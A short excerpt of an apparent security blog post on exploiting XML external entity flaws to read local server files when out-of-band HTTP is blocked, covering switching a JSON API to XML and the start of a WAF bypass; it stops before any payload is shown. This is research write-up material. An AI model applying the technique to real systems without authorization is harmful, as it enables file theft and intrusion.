Spilling Local Files via XXE When HTTP OOB Fails
REDIRECTING TO THE NEW BLOG ... Hello Everyone, Today I will be sharing a very interesting technique of exploiting an XXE which was discovered from what I know by https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/ and later researched on it by GoSecure Team. The scenario was reading out Local Files on the server when HTTP Out of Band was not allowed & only DNS requests reached but the application throw verbose error messages of XML Parsing Discovery so while browsing through the application in Burp I realized app uses REST API over JSON at each endpoint. Next, I tried converting the Content-Type to application/xml and replayed one of the requests and found that the Application threw verbose error which revealed the Application Server(JBoss) and some other error details and It was clear the application was expecting to parse some XML but JSON was given. So, I converted JSON Body to Corresponding XML. WAF Bypass The server was behind a Cloud based WAF which g...